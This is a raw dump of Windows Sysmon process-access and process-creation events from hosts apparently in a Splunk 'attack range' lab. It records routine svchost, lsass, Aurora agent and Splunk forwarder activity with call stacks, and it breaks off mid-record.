12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.303{FE4C2B44-E3D5-63C7-1706-00000000AF02}69685648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.213{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.213{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.213{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.213{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.213{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.211{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.116{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.117{FE4C2B44-E3D5-63C7-1706-00000000AF02}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015864Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.549{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 